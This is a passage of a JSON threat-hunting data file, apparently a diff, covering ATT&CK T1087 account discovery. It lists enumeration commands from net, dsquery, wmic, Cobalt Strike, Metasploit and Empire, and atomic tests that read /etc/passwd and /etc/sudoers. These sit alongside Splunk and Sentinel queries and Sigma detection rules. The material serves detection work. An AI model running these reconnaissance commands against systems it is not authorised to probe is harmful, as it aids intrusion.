#{output_file}", + "Atomic Test #5 - Enumerate users and groups", + "groups", + "id" + ], + "commands": [ + { + "command": "net user [username] [/domain]", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "shell net user [username] [/domain]", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "post/windows/gather/enum_ad_users\nauxiliary/scanner/smb/smb_enumusers", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "dsquery group \"ou=Domain Admins,dc=domain,dc=com\"\ndsquery user \"dc=domain,dc=com\"\ndsquery * OU=\"Domain Admins\",DC=domain,DC=com -scope base -attr SAMAccountName userPrincipalName Description\ndsquery * -filter \"(&(objectCategory=contact)(objectCategory=person)(mail=*)(objectClass=user))\" -Attr samAccountName mail -Limit 0\ndsquery * -filter \"(&(objectCategory=group)(name=*Admin*))\" -Attr name description members", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "shell dsquery group \"out=Domain Admins\",dc=domain,dc=com\"\nshell dsquery user \"dc=domain,dc=com\"\nshell dsquery * OU=\"Domain Admins\",dc=domain,dc=com -scope base -attr SAMAccountName userPrincipleName Description\nshell dsquery * -filter \"(&(objectCategory=contact)(objectCategory=person)(mail=*)(objectClass=user))\" -Attr samAccountName mail -Limit 0\nshell dsquery * -filter \"(&(objectCategory=group)(name=*Admin*))\" -Attr name description members", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "Net.exe localgroup \"administrators\"", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "Net.exe group \"domain 
admins\" /domain", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "Net.exe user * /domain", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "wmic.exe useraccount get /ALL", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "wmic.exe useraccount list", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "wmic.exe qfe get description,installedOn /format:csv", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "wmic.exe process get caption,executablepath,commandline", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "wmic.exe service get name,displayname,pathname,startmode", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "wmic.exe share list", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "wmic.exe /node:\"192.168.0.1\" service where (caption like \"%sql server (%\")", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "wmic.exe get-wmiobject -class \"win32_share\" -namespace \"root\\CIMV2\" -computer \"targetname\"", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "nltest.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "powershell/management/get_domain_sid", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/sid_to_user", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/user_to_sid", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/get_spn", + "source": 
"https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/find_foreign_group", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/find_foreign_user", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/find_gpo_computer_admin", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/find_gpo_location", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/find_localadmin_access", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/find_managed_security_group", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_gpo_computer", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_group", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": 
"powershell/situational_awareness/network/powerview/get_group_member", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_localgroup", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_loggedon", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_ou", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_user", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/user_hunter", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/active_directory/dscl_get_groupmembers", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/active_directory/dscl_get_groups", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/active_directory/dscl_get_users", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + 
"command": "python/situational_awareness/network/active_directory/get_groupmembers", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/active_directory/get_groupmemberships", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/active_directory/get_groups", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/active_directory/get_ous", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/active_directory/get_userinformation", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/active_directory/get_users", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "Atomic Test #1 - Enumerate all accounts", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "cat /etc/passwd > #{output_file}", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "Atomic Test #2 - View sudoers access", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "cat /etc/sudoers > #{output_file}", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "Atomic Test #3 - View accounts with UID 0", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username", + 
"source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "lsof $USER", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "Atomic Test #4 - Show if a user account has ever logger in remotely", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "lastlog > #{output_file}", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "Atomic Test #5 - Enumerate users and groups", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "groups", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "id", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [ + { + "Category": "T1087", + "Built-in Windows Command": "net user [username] [/domain]", + "Cobalt Strike": "shell net user [username] [/domain]", + "Metasploit": "post/windows/gather/enum_ad_users\nauxiliary/scanner/smb/smb_enumusers", + "Description": "Used to add, delete, and manage the users on the computer. Run this command on the users discovered from the previous two commands to gather more information on targeted users." 
+ }, + { + "Category": "T1087", + "Built-in Windows Command": "dsquery group \"ou=Domain Admins,dc=domain,dc=com\"\ndsquery user \"dc=domain,dc=com\"\ndsquery * OU=\"Domain Admins\",DC=domain,DC=com -scope base -attr SAMAccountName userPrincipalName Description\ndsquery * -filter \"(&(objectCategory=contact)(objectCategory=person)(mail=*)(objectClass=user))\" -Attr samAccountName mail -Limit 0\ndsquery * -filter \"(&(objectCategory=group)(name=*Admin*))\" -Attr name description members", + "Cobalt Strike": "shell dsquery group \"out=Domain Admins\",dc=domain,dc=com\"\nshell dsquery user \"dc=domain,dc=com\"\nshell dsquery * OU=\"Domain Admins\",dc=domain,dc=com -scope base -attr SAMAccountName userPrincipleName Description\nshell dsquery * -filter \"(&(objectCategory=contact)(objectCategory=person)(mail=*)(objectClass=user))\" -Attr samAccountName mail -Limit 0\nshell dsquery * -filter \"(&(objectCategory=group)(name=*Admin*))\" -Attr name description members", + "Metasploit": "", + "Description": "Dsquery is a Windows utility on servers that facilitates querying the Active Directory of the domain for lots of information about users, groups, and permissions. 
When constructing dsquery commands, if your domain is \"subdomain.domain.tld\", then your query will include \"dc=subdomain,dc=domain,dc=tld\"" + }, + { + "chain_id": "100137", + "os": "windows", + "parent_process": "Net.exe", + "commandline_string": "localgroup \"administrators\"", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "account_discovery", + "mitre_attack": "T1087", + "itw_sample": "" + }, + { + "chain_id": "100138", + "os": "windows", + "parent_process": "Net.exe", + "commandline_string": "group \"domain admins\" /domain", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "account_discovery", + "mitre_attack": "T1087", + "itw_sample": "" + }, + { + "chain_id": "100139", + "os": "windows", + "parent_process": "Net.exe", + "commandline_string": "user * /domain", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "account_discovery", + "mitre_attack": "T1087", + "itw_sample": "" + }, + { + "chain_id": "100140", + "os": "windows", + "parent_process": "wmic.exe", + "commandline_string": "useraccount get /ALL", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "account_discovery", + "mitre_attack": "T1087", + "itw_sample": "" + }, + { + "chain_id": "100141", + "os": "windows", + "parent_process": "wmic.exe", + "commandline_string": "useraccount list", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": 
"", + "frequency": "low", + "mitre_caption": "account_discovery", + "mitre_attack": "T1087", + "itw_sample": "" + }, + { + "chain_id": "100142", + "os": "windows", + "parent_process": "wmic.exe", + "commandline_string": "qfe get description,installedOn /format:csv", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "account_discovery", + "mitre_attack": "T1087", + "itw_sample": "" + }, + { + "chain_id": "100143", + "os": "windows", + "parent_process": "wmic.exe", + "commandline_string": "process get caption,executablepath,commandline", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "account_discovery", + "mitre_attack": "T1087", + "itw_sample": "" + }, + { + "chain_id": "100144", + "os": "windows", + "parent_process": "wmic.exe", + "commandline_string": "service get name,displayname,pathname,startmode", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "account_discovery", + "mitre_attack": "T1087", + "itw_sample": "" + }, + { + "chain_id": "100145", + "os": "windows", + "parent_process": "wmic.exe", + "commandline_string": "share list", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "account_discovery", + "mitre_attack": "T1087", + "itw_sample": "" + }, + { + "chain_id": "100146", + "os": "windows", + "parent_process": "wmic.exe", + "commandline_string": "/node:\"192.168.0.1\" service where (caption like \"%sql server (%\")", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + 
"registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "account_discovery", + "mitre_attack": "T1087", + "itw_sample": "" + }, + { + "chain_id": "100147", + "os": "windows", + "parent_process": "wmic.exe", + "commandline_string": "get-wmiobject -class \"win32_share\" -namespace \"root\\CIMV2\" -computer \"targetname\"", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "account_discovery", + "mitre_attack": "T1087", + "itw_sample": "" + }, + { + "chain_id": "100215", + "os": "windows", + "parent_process": "nltest.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "account_discovery", + "mitre_attack": "T1087", + "itw_sample": "https://www.hybrid-analysis.com/sample/43bc3efd795f4a1e84f9017f6b39ab331614665b4998e6c806dc8d0417ec314f?environmentId=100" + }, + { + "Empire Module": "powershell/management/get_domain_sid", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/management/get_domain_sid\": [\"T1087\"]," + }, + { + "Empire Module": "powershell/management/sid_to_user", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/management/sid_to_user\": [\"T1087\"]," + }, + { + "Empire Module": "powershell/management/user_to_sid", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/management/user_to_sid\": [\"T1087\"]," + }, + { + "Empire Module": 
"powershell/situational_awareness/network/get_spn", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/get_spn\": [\"T1087\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/find_foreign_group", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/find_foreign_group\": [\"T1087\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/find_foreign_user", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/find_foreign_user\": [\"T1087\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/find_gpo_computer_admin", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/find_gpo_computer_admin\": [\"T1087\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/find_gpo_location", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/find_gpo_location\": [\"T1087\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/find_localadmin_access", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/find_localadmin_access\": [\"T1087\"]," + }, + { + "Empire Module": 
"powershell/situational_awareness/network/powerview/find_managed_security_group", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/find_managed_security_group\": [\"T1087\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_gpo_computer", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_gpo_computer\": [\"T1087\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_group", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_group\": [\"T1087\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_group_member", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_group_member\": [\"T1087\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_localgroup", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_localgroup\": [\"T1087\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_loggedon", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "T1033", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_loggedon\": [\"T1087\",\"T1033\"]," + }, + { + "Empire Module": 
"powershell/situational_awareness/network/powerview/get_ou", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_ou\": [\"T1087\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_user", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_user\": [\"T1087\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/user_hunter", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/user_hunter\": [\"T1087\"]," + }, + { + "Empire Module": "python/situational_awareness/network/active_directory/dscl_get_groupmembers", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/active_directory/dscl_get_groupmembers\": [\"T1087\"]," + }, + { + "Empire Module": "python/situational_awareness/network/active_directory/dscl_get_groups", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/active_directory/dscl_get_groups\": [\"T1087\"]," + }, + { + "Empire Module": "python/situational_awareness/network/active_directory/dscl_get_users", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/active_directory/dscl_get_users\": [\"T1087\"]," + }, + { + "Empire Module": "python/situational_awareness/network/active_directory/get_groupmembers", 
+ "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/active_directory/get_groupmembers\": [\"T1087\"]," + }, + { + "Empire Module": "python/situational_awareness/network/active_directory/get_groupmemberships", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/active_directory/get_groupmemberships\": [\"T1087\"]," + }, + { + "Empire Module": "python/situational_awareness/network/active_directory/get_groups", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/active_directory/get_groups\": [\"T1087\"]," + }, + { + "Empire Module": "python/situational_awareness/network/active_directory/get_ous", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/active_directory/get_ous\": [\"T1087\"]," + }, + { + "Empire Module": "python/situational_awareness/network/active_directory/get_userinformation", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/active_directory/get_userinformation\": [\"T1087\"]," + }, + { + "Empire Module": "python/situational_awareness/network/active_directory/get_users", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/active_directory/get_users\": [\"T1087\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains \"net.exe\"or 
process_path contains \"powershell.exe\")and (process_command_line contains \"*net* user*\"or process_command_line contains \"*net* group*\"or process_command_line contains \"*net* localgroup*\"or process_command_line contains \"cmdkey*\\\\/list*\"or process_command_line contains \"*get-localuser*\"or process_command_line contains \"*get-localgroupmembers*\"or process_command_line contains \"*get-aduser*\"or process_command_line contains \"query*user*\")", + "name": "Account Discovery" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=bash_history cat /etc/passwd | table host,user_name,bash_command", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=bash_history cat /etc/sudoers | table host,user_name,bash_command", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=bash_history \"lsof -u *\" | table host,user_name,bash_command", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=bash_history lastlog | table host,user_name,bash_command", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=bash_history group OR id | table host,user_name,bash_command", + "name": "" + } + ], + "possible_detections": [ + "bash_history logs", + { + "title": "AD Privileged Users or Groups Reconnaissance", + "id": "35ba1d85-724d-42a3-889f-2e2362bcaf23", + "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", + "references": [ + "https://blog.menasec.net/2019/02/threat-hunting-5-detecting-enumeration.html" + ], + "tags": [ + "attack.discovery", + "attack.t1087" + ], + "status": "experimental", + "author": "Samir Bousseaden", + "logsource": { + "product": "windows", + "service": "security", + "definition": "Requirements: enable Object Access SAM on your Domain Controllers" + }, + "detection": { + "selection": { + "EventID": 4661, + "ObjectType": [ + "SAM_USER", + "SAM_GROUP" + ], + "ObjectName": [ + 
"*-512", + "*-502", + "*-500", + "*-505", + "*-519", + "*-520", + "*-544", + "*-551", + "*-555", + "*admin*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "if source account name is not an admin then its super suspicious" + ], + "level": "high" + }, + { + "title": "Local Accounts Discovery", + "id": "502b42de-4306-40b4-9596-6f590c81f073", + "status": "experimental", + "description": "Local accounts, System Owner/User discovery using operating systems utilities", + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "date": "2019/10/21", + "modified": "2019/11/04", + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.yaml" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection_1": [ + { + "Image|endswith": "\\whoami.exe" + }, + { + "Image|endswith": "\\wmic.exe", + "CommandLine|contains|all": [ + "useraccount", + "get" + ] + }, + { + "Image|endswith": [ + "\\quser.exe", + "\\qwinsta.exe" + ] + }, + { + "Image|endswith": "\\cmdkey.exe", + "CommandLine|contains": "/list" + }, + { + "Image|endswith": "\\cmd.exe", + "CommandLine|contains|all": [ + "/c", + "dir", + "\\Users\\" + ] + } + ], + "selection_2": { + "Image|endswith": [ + "\\net.exe", + "\\net1.exe" + ], + "CommandLine|contains": "user" + }, + "filter": { + "CommandLine|contains": [ + "/domain", + "/add", + "/delete", + "/active", + "/expires", + "/passwordreq", + "/scriptpath", + "/times", + "/workstations" + ] + }, + "condition": "selection_1 or ( selection_2 and not filter )" + }, + "fields": [ + "Image", + "CommandLine", + "User", + "LogonGuid", + "Hashes", + "ParentProcessGuid", + "ParentCommandLine" + ], + "falsepositives": [ + "Legitimate administrator or user enumerates local users for legitimate reason" + ], + "level": "low", + "tags": [ + "attack.discovery", + "attack.t1033", + "attack.t1087" + ] + }, + { + "title": "Suspicious Reconnaissance Activity", + 
"id": "d95de845-b83c-4a9a-8a6a-4fc802ebf6c0", + "status": "experimental", + "description": "Detects suspicious command line activity on Windows systems", + "author": "Florian Roth", + "tags": [ + "attack.discovery", + "attack.t1087" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "net group \"domain admins\" /domain", + "net localgroup administrators" + ] + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Inventory tool runs", + "Penetration tests", + "Administrative activity" + ], + "analysis": { + "recommendation": "Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM)" + }, + "level": "medium" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "API monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "API monitoring" + ], + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account metadata", + "description": "Data and information that describe a user account and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "user" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process 
creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
